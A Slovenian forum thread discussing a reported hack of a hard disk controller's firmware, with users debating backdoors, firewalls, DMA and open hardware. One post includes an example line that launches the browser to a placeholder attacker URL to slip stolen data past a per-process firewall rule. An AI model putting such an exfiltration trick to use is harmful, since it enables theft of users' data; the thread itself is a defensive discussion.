» »

Zanimiv napad na kontroler trdega diska

1
2
3

misek ::

Matthai je izjavil:

BlackMaX je izjavil:

misek je izjavil:

BlackMaX je izjavil:

how to prevent or defend against it?
Prebereš trenutno stanje pomnilnika, ga shraniš in periodično preverjaš ali so se podatki spremenili.


Ker sm rookie pri tem, kako naj začnem?

Ne moreš. Ker so vendor specific ukazi za branje, poleg tega je koda na čipu kompresirana z neznanimi algoritmi, itd.

Lahko pa vsakič odločaš čip dol in ga s programatorjem prebereš, pa potem prilotaš nazaj, ja...
V novici piše, da je na koncu zapisal kar preko namenske aplikacije. Če gre pisanje gre tudi branje?
To mu je na koncu omogočilo zapis svoje lastne programske kode na kontroler trdega diska kar s pomočjo posebne aplikacije, ki jo je pognal na računalniku.

Oberyn ::

BaToCarx je izjavil:

Vsem je že povsem jasno da 90% uporabnikov ST ima tajne in predvsem v miljardah evrov cenjene informacije, ki bi jih pol sveta takoj rado imelo, z raznimi metodami.

Ja, na primer jaz imam na svojem kompu tajne in skrajno dragocene informacije.

Recimo moj dnevnik oskrbovanja vrtička za bajto (si moram vse zapisati, sicer sem naslednje leto izgubljen med paradižniki...). Ali pa fotke kajakaških in plezalskih podvigov. Pa načrt za poličke v shrambi, če bi jih moral še enkrat narediti. Take zadeve.

Zdaj, ali je to skrajno dragoceno? Meni je, torej dokler sem živ, je skrajno dragoceno. Pika.

Ali je to tajno? Mater da je. Moram zakleti. U PM, to je tajno. Zakaj? Zato, ker sem jaz zasebni individium in sem se odločil, da so moje zasebne pizdarije tajne in sem se odločil, da na tej točki razvoja vrste in družbe imam do tega pravico. In nenazadnje, ker sem gorenjc in iz čiste trme. Ni tistega zakona, ki bi to trmo povozil, razen rubber hose zakona (kar je na žalost vse bližje...).

Zdaj, ali bi te informacije pol sveta rado takoj imelo? Zgleda da je tako. In sicer samo zato, ker jih ne dam na svetlo. Saj če bi jih dal, ne bi absolutno nikogar zanimale. Ampak jih ne dam iz navedenih razlogov. Ne dam jih pa pika. Požrite se.

mujek ::

Največji problem je v proizvajalcu (krminlnika) diska.
Če nekdo, da nek izdelek na tržišče in ne zaklene procesorja je že nekomu drugemu pustil odprta vrata.
Vsak (no, vsak s katerimi sem do zdaj delal) mikrokontoler ima možnost zaklepa procesorja (da ne moreš prebrati vsebine ROM, ne moreš naložiti nove kode, itd.)

JTAG vmesnik (ponavadi - zavisi od proizvajalca) tudi omogoča, da fizično prekineš povezavo (na vmesnik pripelješ višjo napetost kot je dovoljeno in s tem namensko skruiš varovalko) in s tem čisto onemogočiš tak način dostopa.

In še enkrat ponovim - kar je že bilo rečeno z stani drugih:
To ni luknja - to je feature katerega je nekdo pozabil onemogočit. Debug vmesnik.

Glede na to, da s tem lahko pridemo do programa krmilnika jo lahko tudi analiziramo in preverimo ali vsebuje kake (NSA) backdore.

EDIT: Vsi ki ste zdaj posrani zaradi tega ker se bojite da bo nekdo Vam kradel Vaše Vredne informacije:
Pojdite in si kupite 10 takih diskov, JTAG vmesnik, par kil kave in napišite svoj krmilnik za disk ki bo 100% NSA, SOVA,... backdoor free.
To je idealna priložnost. Drugi proizvajalci so mogoče bolj sposobni in zaklenejo jtag in se tako ne vidi, če komu pošiljajo.

Zgodovina sprememb…

  • spremenilo: mujek ()

gzibret ::

Ah.... pa smo spet tam.. saj nimate nič za skrivat, kar naj gledajo... Če si pa terorist, te bodo pa na ta naičin dobili, kar je pa sploh fajn stvar.

Dejstvo je, da tole omogoča packarije, ali pa, da so že sami proizvajalci namontirali v kontrolerje packarije, morda samoiniciativno, morda po naročilu. Temlem ni nič več za zaupat. Še najboljša zaščita bo torej uporabljat kluster 486-k, in ogromno gručo 60MB diskov ;)
Vse je za neki dobr!

Izi ::

A tisti del, ko je moral odlotati čip, da ga je lahko Flashal ste pa kar vsi spregledali?

Teoretično pa je v nevarnosti vsaka naprava, ki ima lasten firmware, kar pa je dandanes tako rekoč vsaka posamezna komponenta v računalniku, tudi miška in tipkovnica, kot se je nekdo na začetku hotel pošaliti, ampak dejstvo je, da ima dandanes večina novejših (bolj naprednih in dražjih) mišk in tipkovnic že svoj lasten firmware in svoj lastni spomin.

Sploh pa to ni nič novega. Stari virusi kakšnih 20 let nazaj so redno napadali CMOS na matični plošči in zagonski sektor na trdih diskih in ju tudi uspešno okužili. Antivirus programi uspešno preprečijo oboje.
V nevarnosti za okužbo so: Matična plošča, trdi disk, SSD, grafična kartica, zvočna kartica, printer, skener, večina USB naprav, tipkovnica, miška, ...
Na srečo pa je vsaj dandanes za uspešno okužbo potreben fizičen dostop do računalnika. Pri spreminjanju firmawarea je potrebno vedno imeti administrativne pravice in fizična potrditev kar nekaj obvestil za nevarnost, tako da od zunaj to ne gre.
Pa en dober Antivirus program je treba imeti, da že v kali zatre vse poskuse.

Druga stvar, ki se jo pa res lahko bojimo, pa je kaj nam proizvajalci že sami vgradijo v svoj firmavere, ki je sedaj že tako rekoč v vsaki komponenti. V tem primeru pa pomaga edino dober obojestranski firewall. Se pravi, tak firewall, ki ne blokira samo sumljivih dostopov od zunaj. Danes je najpomembnejši firewall, ki prepreči vsakršno sumljivo pošiljanje podatkov ven iz našega računalnika.

Paranoiki imamo po defaultu popolnoma blokiran ves izhodni promet. Za brskalnik in online igre pa za vsakega posebej skrbno določene odprte protokole in porte.
Za dohodni promet zna dokaj dobro skrbeti dober antivirusni program medtem ko moramo za ves odhodni pomet skrbeti popolnoma sami. Kdor je prvič namestil dober firewall in malo spremljal odhodni promet je zgrožen ugotovil, da se tako rekoč vse kar počnemo na računalniku sproti pošilja v internet. Resda je 90% tega prometa anonimnega, ampak vseeno je zame glavna stvar na računalniku Firewall, ki zanesljivo blokira ves odhodni promet.

mujek ::

Izi je izjavil:

A tisti del, ko je moral odlotati čip, da ga je lahko Flashal ste pa kar vsi spregledali?
Iz članka:
Ofcourse, I could make this into a full hack, but needing to use JTAG to poke it in RAM every time the hard disk boots would make it pretty useless. I needed to make it persistant, that is, I needed to store my modifications somewhere where it would be picked up again every time the hard disk powers on. My location of choice was the flash rom. I could probably also have put it somewhere in the reserved sectors on the disk itself, but if I messed something up, I would have no way to recover my disk. The flash chip is just an eight-pin standard part, so I could easily take it out, flash it and put it in again. For that purpose, I desoldered it and put it on a bit of veroboard, so I could easily switch it between a programmer and the hard disk:
Brez lotanja mu je tudi delovalo.

Izi je izjavil:

Druga stvar, ki se jo pa res lahko bojimo, pa je kaj nam proizvajalci že sami vgradijo v svoj firmavere, ki je sedaj že tako rekoč v vsaki komponenti. V tem primeru pa pomaga edino dober obojestranski firewall. Se pravi, tak firewall, ki ne blokira samo sumljivih dostopov od zunaj. Danes je najpomembnejši firewall, ki prepreči vsakršno sumljivo pošiljanje podatkov ven iz našega računalnika.
In kaj pravijo tvoji firewalli? Kolikokrat se je do sedaj zgodilo, da ti je disk kotel nekaj poslati preko mreže nekomu drugemu?

darkolord ::

A tisti del, ko je moral odlotati čip, da ga je lahko Flashal ste pa kar vsi spregledali?
Na koncu ga je flashal kar z uradnim firmware toolom, brez lotanja. Bi pa verjetno šlo tudi direkt na vezju brez lotanja, toretično možno tudi med delovanjem(!):

spamtrap@hokej.si
spamtrap@gettymobile.si

Zgodovina sprememb…

  • zavarovalo slike: darkolord ()

SmeskoSnezak ::

Kako pa je z trdimi diski, ki so v zunanjih ohišjih in preko USB-ja povezani na računalnik? Lahko dobi remote dostop tudi do teh diskov? A prav razumem vse vkup? On lahko pridobi remote dostop do trdega diska in mu zamenja firmware na daljavo, kaj je prav grozljivo.
@ Pusti soncu v srce... @

Brane22 ::

mujek je izjavil:


EDIT: Vsi ki ste zdaj posrani zaradi tega ker se bojite da bo nekdo Vam kradel Vaše Vredne informacije:
Pojdite in si kupite 10 takih diskov, JTAG vmesnik, par kil kave in napišite svoj krmilnik za disk ki bo 100% NSA, SOVA,... backdoor free.
To je idealna priložnost. Drugi proizvajalci so mogoče bolj sposobni in zaklenejo jtag in se tako ne vidi, če komu pošiljajo.


Open hardware. V bistvu bi bil že čas. Ali da dobiš odprt izdelek z odprtokodnim FW ali pa da se pojavijo izdelki, ki so odprti že v zasnovi. Če prihajajo telefončki in ostale zadeve, zakaj ne bi še diski, sploh sedaj ko se NAND FLASH kar nekako prodaja in ne razmišljajo vsi o vrtečih se krožnikih ?

darkolord ::

Kateri telefončki pa imajo open hardware?

Sicer pa je pri open hardware problem, da ti samo FW nič ne pomaga, dokler ne moreš sam zbuildati tudi hardvera, za kar pa niti približno nimaš resourcov.
spamtrap@hokej.si
spamtrap@gettymobile.si

Jst ::

>Ah bikec faše eno inekcijo Midazolam @ Wikipedia problem rešen. :D

Dormicum, ki se uporablja za: "moderate to severe insomnia," na meni ne deluje. Jeba...


---

Glede firewalla: Če ga imaš na računalniku, preprečuješ "samo" stvari, ki jih dela OS, ne pa tudi kakšna koda v firmware-u.

Win7 in naprej, imajo firewall, ki je precej dobra stvar. Res je, da ga je težko nastaviti, sploh, ko to delaš prvič, ampak gre. Jaz vedno prvo nastavim tako, da zablokiram ves odhodni promet, potem pa vsako stvar posebej dovolim.

Teli "for noobs" firewalli, še posebej zastonjski, so bolj kot ne, blažena voda. Zaženite "Windows Firewall with Advanced Security" ("wf.msc") in se malo razglejte. Se splača vzeti si čas in ga nastaviti.
Islam is not about "I'm right, you're wrong," but "I'm right, you're dead!"
-Wole Soyinka, Literature Nobelist
|-|-|-|-|Proton decay is a tax on existence.|-|-|-|-|

jype ::

darkolord> Kateri telefončki pa imajo open hardware?

FreeRunner: http://www.openmoko.com/freerunner.html

trizob ::

BlackMaX je izjavil:

Zelo zanimivo :)

In 90% folka ne ve za to, če ne še več.


Zdaj pa tricky question, how to prevent or defend against it?


Redno posodabljanje strojne programske opreme in dosledno preverjanje integritete podatkov - te prenešene programske opreme ter vse do sedaj uporabne dobre prakse (od protivirusnih programov do ACL ...), da preprečimo vdor z eskalacijo pravic, ki omogoča takšno namestitev oz. okužbo z zlonamerno kodo, ki namesti takšno drisko.

MrStein ::

Izi, Jst, če omogočita "izhod" browser-ju, potem zlobna koda mora samo sprožiti obisk URL-ja http://evil.data.collector/victim_data_...... ?
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

66speeder66 ::

Ah, zato mi je cela kolekcija porničev neznano kam izginala :'(

Izi ::

MrStein je izjavil:

Izi, Jst, če omogočita "izhod" browser-ju, potem zlobna koda mora samo sprožiti obisk URL-ja http://evil.data.collector/victim_data_...... ?

Link ti ne deluje.
Drugače pa izhod določiš samo točno določenemu procesu. Saj ne odpreš recimo porta 80, kar za vse programe. Če na primer izhod dovoliš samo za Firefox.exe, ne more noben drug proces izkoristiti tega izhoda. Vsak proces ima svoje unikatno ime in se ne more kar pretvarjati, da je nekdo drug.

Kot je Jst omenil, tudi jaz uporabljam kar vgrajeni "Windows Firewall with Advanced Security". Sem pregledal vse kar obstaja na področji softwareskih firewallow pa je ta edini, ki zadosti vsem mojim potrebam. Je pa na žalost mnogo preveč kompliciran za navadne uporabnike. Vsako izhodno pravilo je treba ročno sestaviti.

darkolord ::

Vsak proces ima svoje unikatno ime in se ne more kar pretvarjati, da je nekdo drug.
Če ima firmware od diska prste vmes se seveda lahko pretvarja, da je drug proces.
spamtrap@hokej.si
spamtrap@gettymobile.si

Jst ::

Zato sem pa omenil, da je vsak Firewall, ki teče na OSu, omejen.

Če imaš pa dodatno kišto, ki služi kot firewall, ima pa tudi svoje slabosti.

---

>Sem pregledal vse kar obstaja na področji softwareskih firewallow pa je ta
>edini, ki zadosti vsem mojim potrebam.

V bistvu so drugi firewall-i ponavadi "samo" dumbed down layer za Windowsov firewall. Razen kakšni, ki jih je treba plačati (mesečno plačevati). Enterprise izdelki - kateri imajo še druge mehanizme (IDS, logging), ki so pa za navadnega uporabnika overkill. Z wf.msc se fajn namučiš po frišnem postavljanju sistema, ampak imaš tako potem kompleten nadzor, kaj OS spušča v svet.
Islam is not about "I'm right, you're wrong," but "I'm right, you're dead!"
-Wole Soyinka, Literature Nobelist
|-|-|-|-|Proton decay is a tax on existence.|-|-|-|-|

Izi ::

darkolord je izjavil:

Če ima firmware od diska prste vmes se seveda lahko pretvarja, da je drug proces.

Firmware sploh ni proces in sam od sebe ne more delati nič drugega kot upravljati napravo na katero je montiran. Lahko pa ga preko driverja upravlja nek software in šele ta je proces, ki teče na našem računalniku in ima svoje ime.
Hočem reči, da Firmware nima direktne povezave z našim operacijskim sistemom. Vedno mora biti naložen in pognan še en program, ki preko driverja dostopa do firmwarea.
Firmware torej ne more nikomur nič poslati, ker izven svoje naprave nima nobenega dostopa. V primeru trdega diska bi seveda lahko uničil podatke na enoti, ali pa programu, ki bi do njega dostopal preko driverja pošiljal napačne podatke. To pa je bolj ali manj vse. Nikakor pa s spremembo firmwarea nihče od zunaj ne bi mogel dostopati do podatkov. Medtem ko tvoje podatke iz trdega diska lahko naokoli pošilja navaden zlobni pogramček brez da bi bilo potrebno spreminjati ali karkoli šariti po kateremkoli firwareu.

Zgodovina sprememb…

  • spremenil: Izi ()

techfreak :) ::

Ne me držat za besedo, vendar se mi zdi da sem bral o tem, da je možna komunikacija med različnimi napravami (npr. pci mrežna kartica in sata disk) v računalniku brez uporabe programov na OSu.

darkolord ::

Nikakor pa s spremembo firmwarea nihče od zunaj ne bi mogel dostopati do podatkov.
Motiš se. Firmware od diska lahko prestreže zahtevek za branje izvršljive datoteke in v odgovor injecta del kode, ki počne ravno to. Ko ti iz diska prebereš "firefox.exe", dobiš "firefox.exe z dodatkom", ki tvoje podatke iz procesa firefoxa lepo razpošilja ven po portu 80. Na primer.

V tem primeru sicer pomaga enkripcija, so pa še druge stvari ...
spamtrap@hokej.si
spamtrap@gettymobile.si

Zgodovina sprememb…

  • spremenilo: darkolord ()

Mavrik ::

darkolord je izjavil:

Nikakor pa s spremembo firmwarea nihče od zunaj ne bi mogel dostopati do podatkov.
Motiš se. Firmware od diska lahko prestreže zahtevek za branje izvršljive datoteke in v odgovor injecta del kode, ki počne ravno to. Ko ti iz diska prebereš "firefox.exe", dobiš "firefox.exe z dodatkom", ki tvoje podatke iz procesa firefoxa lepo razpošilja ven po portu 80. Na primer.

V tem primeru sicer pomaga enkripcija, so pa še druge stvari ...


Kar je natanko to kar je Travis naredil in o postopku razlaga v svojem predavanju - hotel je namestiti stvari na svoj Samsung SmartTV, kjer preverjajo podpise datotek za nadgradnjo. Ko je firmware v prvem passu preveril podpis mu je USB poslal "pravo" datoteko, ko pa je začel datoteko brati pri nadgradnji, pa je dobil drugo datoteko z drugo vsebino.
The truth is rarely pure and never simple.

Blisk ::

pegasus je izjavil:

Torej ona novica pred meseci, ko je neka ameriška ustanova po virusni okužbi fizično uničila svoje pcje in z njimi povezan hardver (če me spomin ne vara, se je omenjalo tudi miške in kamere), dobi čisto nov pomen ... mogoče so vedeli več od običajnih smrtnikov? ;)

saj to sem jaz že tam takrat napisal.

Dejansko je zdaj bolj jasno, da je vsaka komponenta mini računalnik kamor lahko naložiš svoj FW in delaš kar češ.
Danes ne moreš več kupit varnega računalnika.
Zdaj je tudi bolj jasno zakaj se prodajajo vedno bolj zmogljivi računalniki.
Zaradi bolj zahtevnega špijuniranja ljudi in bolj in real time!

Verjamem, da bi če bi se kdo lotil in vsaki komponenti naložil gor svoj FW, lahko dobil "varen" računalnik, ampak je spet vprašanje kaj pa operacijski sistem, kateri NE špijunira?

tablet ::

Jaz sem se odločil, da je moje stanovanje tajno, pa mi iz sosednjega bloka z daljnogledom noter špegajo. Sem hotel zazidati okna, pa se bojim, da je v malti kakšna luknja. V tem primeru bi to bil samo strošek.

techfreak :) ::

Danes ne moreš več kupit varnega računalnika.

To že nekaj časa ne moreš več. Načeloma bi za varen računalnik moral sam narediti svoj hardware, kar pa si lahko trenutno privoščijo samo redka podjetja.

Zdaj je tudi bolj jasno zakaj se prodajajo vedno bolj zmogljivi računalniki.

Ker hočemo večjo zmogljivost?

Dejansko je zdaj bolj jasno, da je vsaka komponenta mini računalnik kamor lahko naložiš svoj FW in delaš kar češ.

To je delno zaradi vse večje želje po boljšem performansu, delno pa zaradi tega cenovno verjetno so takšni procesorji tako poceni, da se ne splača zafrkavati z alternativami, poleg tega pa to omogoča enostavne nadgradnje programske opreme.

Rias Gremory ::

Skrajni čas, da se začne delati na open source strojni opremi.

darkolord ::

@Rias Gremory: in kako bi le-ta pomagala?
spamtrap@hokej.si
spamtrap@gettymobile.si

Jst ::

>To je delno zaradi vse večje želje po boljšem performansu

Ter še: Firmware naprave ali kosa hardware-a v računalniku je - poenostavljeno povedano - v bistvu OS te naprave. Driver pa skrbi, da se "glavni" OS (Win, linux, *bsd,...) lahko pogovarja z napravo.

Za primer razmislite, kaj vse mora početi Sandforce kontroler v SSDju. Skrbeti mora za pisanje, ki, kot vemo, mora prvo pobrisati celoten page pred pisanjem, skrbeti za enakomerno rabo, ob tem pa še stiska podatke.

Pri hibridnih diskih je zadeva še bolj kompleksna.

Nazadnje pa imajo komponente (in naprave) še debug mode.

Vektorjev za napad je ogromno.
Islam is not about "I'm right, you're wrong," but "I'm right, you're dead!"
-Wole Soyinka, Literature Nobelist
|-|-|-|-|Proton decay is a tax on existence.|-|-|-|-|

Rias Gremory ::

darkolord je izjavil:

@Rias Gremory: in kako bi le-ta pomagala?

Ja vsak bi lahko pogledal čip in firmware. Torej bi imeli firmware brez "dodatkov".

MrStein ::

Izi je izjavil:

MrStein je izjavil:

Izi, Jst, če omogočita "izhod" browser-ju, potem zlobna koda mora samo sprožiti obisk URL-ja http://evil.data.collector/victim_data_...... ?

Link ti ne deluje.

Seveda ne, če je samo primer.


Drugače pa izhod določiš samo točno določenemu procesu. Saj ne odpreš recimo porta 80, kar za vse programe. Če na primer izhod dovoliš samo za Firefox.exe, ne more noben drug proces izkoristiti tega izhoda.

exec("firefox.exe","hxxp://evil.data.collector/victim_data_"); // hxxp da ST ne popači vrstice

Da naprednih trikov ne omenjam.
Ne trdim, da imaš luknjo, ampak da "omejiti izhod na firefox.exe" niti približno ni tisto, kar se komu na prvi pogled zdi. Si probal kake leak teste?

Kot je Jst omenil, tudi jaz uporabljam kar vgrajeni "Windows Firewall with Advanced Security". Sem pregledal vse kar obstaja na področji softwareskih firewallow pa je ta edini, ki zadosti vsem mojim potrebam. Je pa na žalost mnogo preveč kompliciran za navadne uporabnike. Vsako izhodno pravilo je treba ročno sestaviti.

Kar kliče po po GUI frontendu. (saj je nekdo že omenil, da so 3rd party firewall-i baje le to)
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

darkolord ::

Ja vsak bi lahko pogledal čip in firmware.
Kako bi pa čip pogledal?
spamtrap@hokej.si
spamtrap@gettymobile.si

MrStein ::

Rias Gremory je izjavil:

Skrajni čas, da se začne delati na open source strojni opremi.

Open-source hardware @ Wikipedia ?
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

techfreak :) ::

darkolord je izjavil:

Ja vsak bi lahko pogledal čip in firmware.
Kako bi pa čip pogledal?

Dober mikroskop? Čeprav je vse kar je več od tranzistorja preveč zakomplicirano.

darkolord ::

Z dobrim mikroskopom vidiš glih, da čip "je". Nekaj 10k+ tranzistorjev na par kvadratnih milimetrih je pa nekaj drugega...
spamtrap@hokej.si
spamtrap@gettymobile.si

Rias Gremory ::

Čip as in shema. Samo domnevam, da je potem treba imeti tudi svoje tovarne za izdelovanje.

darkolord ::

In ravno zaradi tega ti vse skupaj bore malo pomaga.
spamtrap@hokej.si
spamtrap@gettymobile.si

Brane22 ::

Tudi brez detajlne sheme čipa si z odprtim FW veliko na boljšem.

Težko je zabasati kaj bistvenega na čip, pa da se to ne bo poznalo na maskah.

Pa tudi če bi, se prostor za packanja proizvajalcem radikalno skrči in s tem tudi obseg primerov ko se to splača in ko je to sploh praktično možno.

Poglej si recimo do kakšnih detajlov na forumih prežvekujejo maske prihajajočega Steamrollerja.

darkolord ::

Poglej si recimo do kakšnih detajlov na forumih prežvekujejo maske prihajajočega Steamrollerja.
Če kot maske misliš tisti thumbnail od die shota, je približno tako, kot če bi gledal satelitsko sliko kitajske tovarne in iz nje probal ugotoviti, ali te kitajci lupijo pri štancanju.

Tam je na vsakem pikslu slike kakih 1000 tranzistorjev.
spamtrap@hokej.si
spamtrap@gettymobile.si

trizob ::

Rias Gremory je izjavil:

darkolord je izjavil:

@Rias Gremory: in kako bi le-ta pomagala?

Ja vsak bi lahko pogledal čip in firmware. Torej bi imeli firmware brez "dodatkov".


Tudi pri kriptografski orodjih, ki so odprtokodna je največji problem revizija kode. Jaz in ti znava pasi krave tako kot mnogi drugi, kode pa ne znamo pregledati dovolj kompetentno.

Ob predpostavki, da je strojna programska manj zapletena, to še lahko sami prevedemo (seveda ne vsi uporabni) in jo stlačimo na ustrezno strojno opremo. Že izdelane strojne opreme pa ne moremo nikakor pregledati! A boš izdeloval tudi lastno strojno opremo? Si resen?

Brane22 ::

darkolord je izjavil:

Poglej si recimo do kakšnih detajlov na forumih prežvekujejo maske prihajajočega Steamrollerja.
Če kot maske misliš tisti thumbnail od die shota, je približno tako, kot če bi gledal satelitsko sliko kitajske tovarne in iz nje probal ugotoviti, ali te kitajci lupijo pri štancanju.

Tam je na vsakem pikslu slike kakih 1000 tranzistorjev.


Probaj s 1000 tranzistorji naredit kaj pametnega, da tega ne bo nihče izvohal in da ne bo vplivalo na karakteristike čipa.

Tudi če ti rata, bo za to potrebno daleč več truda od simpl programčka v internem FLASH-u.

Pa ni 2x za reč, da se folk ob splavitvi ne bi prikazal z daleč bolj detaljno sliko. Folk deenkapsulira čipe brez neke raketne tehnike. Njihovo branje je druga stvar ampak sken maske ne bi smel biti tak problem.

Rias Gremory ::

A boš izdeloval tudi lastno strojno opremo? Si resen?

Če bi imel vire, bi ja.

darkolord ::

Probaj s 1000 tranzistorji naredit kaj pametnega, da tega ne bo nihče izvohal in da ne bo vplivalo na karakteristike čipa.
1000 tranzistorjev je manj kot 1 promil pri tistem AMDju. Na oni slikici je milijon tranzistorjev na 10x10pix (še zmeraj _popolnoma_ neprepoznavno).

Tudi daleč daleč bolj detajlna slika je popolnoma neuporabna za detajlne analize - te ročno deenkapsulirane pa sploh. Pri kakšnih enostavnih starih mikrokontrolerjih ali kaj podobnega še gre, pri sodobnih procesorjih pa niti približno.

Malo ti skala ni jasna - nožice tranzistorjev so pri že kar nekaj let starem postopku debele milijoninko milimetra, kar je samo nekaj atomov.
spamtrap@hokej.si
spamtrap@gettymobile.si

DavidJ ::

Pohvale za super spisan prispevek. Bi pa pripomnil, da v slovenščini za izraz kontroler obstaja že ustaljen prevod, in sicer krmilnik.
"Do, or do not. There is no 'try'. "
- Yoda ('The Empire Strikes Back')

Blisk ::

Niso problem transistorji in te zadeve v procesorjih, saj ne štancajo na procesorje zadev, če se mene vpraša.
Pač pa je narejen posebej čip za to, ki ga ruknejo na katerokol napravo in omogoča dostop.
Mislim, da se tudi te opcije ne poslužujejo kaj dosti, ker to stane, zadeve pa morajo biti poceni.
Se pravi bolj problematične so naprave, kjer ti lahko shraniš gor svoj softwer, ki dela to in to.
Ja mislim da dejansko bi lahko naredil svoj varen PC, če bi naložil na vsako komponento svoj firmware in naredil svoj bios.
Zato tudi določene firme NE dovoljujejo nalaganja česarkoli na naprave, kot naprimer apple.

Dejstvo pa je, da kdor se dober spozna na programiranje, lahko snifa promet na izhodu mrežne kartice in se da marsikaj ugotoviti ali kaj hodi na net brez našega dovoljenja. Seveda je spet vprašanje če ta sniferski program dela nonstop ali samo, ko ga sprožijo.

Brane22 ::

darkolord je izjavil:


Tudi daleč daleč bolj detajlna slika je popolnoma neuporabna za detajlne analize - te ročno deenkapsulirane pa sploh. Pri kakšnih enostavnih starih mikrokontrolerjih ali kaj podobnega še gre, pri sodobnih procesorjih pa niti približno.


Pa saj en rabim detajlne analize. Ne rabim funkcionalnega checka vsakega gatea. Rabim videt, če so spravili not kake kompleksnejše dodatke, kjer bi se lahko skrival namenski backdoor.

Malo ti skala ni jasna - nožice tranzistorjev so pri že kar nekaj let starem postopku debele milijoninko milimetra, kar je samo nekaj atomov.


Vsekakor. Osvetljijejo jih skozi nešteto mask pomočjo deep UV, ampak relativno grobi check pa iz nekega vzroka kao ni možen. Sploh ker me niti ne zanima do zadnjega gatea zadnjega tranzistorja.;((



Ja. osvetljujejo se

Matthai ::

No, na kratko par zadev.

Malce sem razmislil glede varnosti oz. rešitev in načeloma vidim dva problema.

Prvič. Problema spreminjanja podatkov se lahko rešimo s softwerskim šifriranjem diska. Takrat disk ne ve kateri podatki so na njem in tudi ne ve kako jih (smiselno) spreminjati. Lahko jih sicer okvari, ampak to rešujemo z backupom.

Drugič. Trdi disk ima direct memory access, kar pomeni, da lahko bere in piše po RAM-u mimo procesorja in mimo operacijskega sistema. Sicer mu dostop do RAM-a omogoča MMU (Memory management unit), v sodelovanju z OS-om (predvidevam). Kar pomeni, da ga operacijski sistem lahko omeji pri dostopu do RAM-a (se pravi ne more krasti šifrirnih ključev oziroma injectati zlonamerne kode direktno v RAM). Če seveda OS to omogoča.

No, tule me zanima še kakšno strokovno mnenje, ker teh zadev ne poznam toliko.

Namreč, ori firewire je recimo tako, da je preko firewire vmesnika mogoče packati po celotnem RAM-u in OS oz. CPU tega ne zaznata. Deluje pa to Windowsih (testiral sem v Xp - lahko sem preko firewire dumpnil celoten RAM, vključno s šifrirnimi ključi), v Linuxu pa od popravka pred par leti ne več. O tem pripravljam članek za "malo šolo informacijske varnosti" na http://pravokator.si.

Toliko o zaščiti.

Zdaj pa firewalli. Zakaj mislite, da je mogoče podate ven iz računalnika pošiljati samo preko omrežja?

Kuhn in Anderson sta napisala en zanimiv članek*, v katerem sta leta 1998 (!) opisala možnost, da bi nekdo razvil poseben virus, ki bi s pomočjo povečane aktivnosti, npr. procesorja ali trdega diska oziroma prek ohranjevalnika zaslona, oddajal sporočila v obliki sprememb elektromagnetnega sevanja. Avtorja sta se poigravala z idejo razvoja posebne programske opreme za ugotavljanje piratstva v podjetjih. Tak program naj bi s pomočjo opisanega generiranja elektromagnetnega sevanja v časovnih intervalih oddajal licenčne številke programske opreme skupaj z naključno številko, kar bi prisluškovalcem omogočilo ugotoviti, koliko različnih kopij nekega programa uporablja določeno podjetje, ne da bi fizično sploh vstopili v njegovo stavbo (strani 125-126 in 136).

* Markus G. Kuhn, Ross J. Anderson. 1998. Soft Tempest: Hidden Data Transmission Using Electromagnetic Emanations.

No, kako pa sedaj pomaga firewall? >:D

Aja, pa še izraz krmilnik. Ja, žal sem ga nekako spregledal. Sem imel ves čas tak občutek, da kontroler ne zveni dobro, ampak se nisem spomnil, da bi pogledal v iSlovar.

Drugače pa definitivno bi bila korak v pravo smer opensource strojna programska oprema. Sicer ta korak ne bi 100% zagotovil varnosti, kljub temu pa bi jo kar precej izboljšal. Žal Coreboot projekt napreduje zelo počasi (ampak glej ga vraga - podpirajo vse Chromebooke!), pri ostalih zadevah smo pa šele čisto na začetku...
All those moments will be lost in time, like tears in rain...
Time to die.

Zgodovina sprememb…

  • spremenil: Matthai ()

darkolord ::

ampak relativno grobi check pa iz nekega vzroka kao ni možen.
Relativno grobi check je seveda možen, je pa pač... relativno grob. Površen. Originalne maske za osvetljevanje so seveda večje, ti pa ne pomagajo, ker moraš preveriti fizičen izdelek.
spamtrap@hokej.si
spamtrap@gettymobile.si

Brane22 ::

In ker simetrija v fiziki deluje, ti lahko z UV preveriš izdelek, če so ga oni z UVjem uspeli osvetliti in skozi žnj postopkov obdelati.

Sploh pa, kot rečeno, več kot površni check verjetno niti ne rabiš.

Mene ne zanima debelina nanosa posamezne vezi ali širina tam enkega razmaka. Ta je mogoče pomembna za funkcionalni test, ampak ker tu ne loviš imperfekcij postopka ampak _namenske_ backdoore, to tle ne igra vloge.

Tu ne govorimo o primerih, ko je na dekoderju naslovov v nekem sklopu nekdo pozabil upoštevati dodatnih zakasnitev na nekem od signalov, zaradi česar bi mogoče v nekaterih pogojih na nekaterih čipih v nekih temperaturah in napetostih prišel skozi TLB cache naslov, ki ne bi smel.

Tak bug je seveda moč izrabiti, ni pa njegova izraba predvidljiva, kar za backdoor rabiš.
Ni pa videti, kako bi to naredil:

- neopazno, s subtilno "napako"
- tako da ne rušiš lastnosti vezja ( dodatne zakasnitve in s tem bistveno manjša hitrost)
- da se nihče ne bo spotaknil ob to in da ni verjetno, da bodo stvar izvohali hekerji, sploh tisti, ki si imajo priložnost ogledati čip.

Da ne govorimo o tem, da mora proizvajalec čipa uporabiti postopke, ki jih bo ta preživel.

Tebi pri analizi tega ni treba. Komot lahko uporabiš elektronski mikroskop ali recimo tega s tipalom na tunelski efekt, če te kje zanimajo kakšni detajli.

Zgodovina sprememb…

  • spremenilo: Brane22 ()

Brane22 ::

Matthai je izjavil:


Drugič. Trdi disk ima direct memory access, kar pomeni, da lahko bere in piše po RAM-u mimo procesorja in mimo operacijskega sistema. Sicer mu dostop do RAM-a omogoča MMU (Memory management unit), v sodelovanju z OS-om (predvidevam). Kar pomeni, da ga operacijski sistem lahko omeji pri dostopu do RAM-a (se pravi ne more krasti šifrirnih ključev oziroma injectati zlonamerne kode direktno v RAM). Če seveda OS to omogoča.


Nisem ziher da je tako. SATA _kontroler_ je lahko master, disk sam pa AFAIK ne. SATA je v bistvu ATA/IDE s tankim serijskim dodatkom, ATA pa ni DMA master. Omogoča sicer prenose, vendar samo tiste, ki jih ukaže in nastavi kontrolelr pred tem. Če bi disk začel nekaj motovilit sam, bi ga kontroler verjetno ignoriral, če že ne bi sprožil kakšnega errorja, zaradi katerega bi driver reagiral in zresetiral ali deaktiviral disk.

hojnikb ::

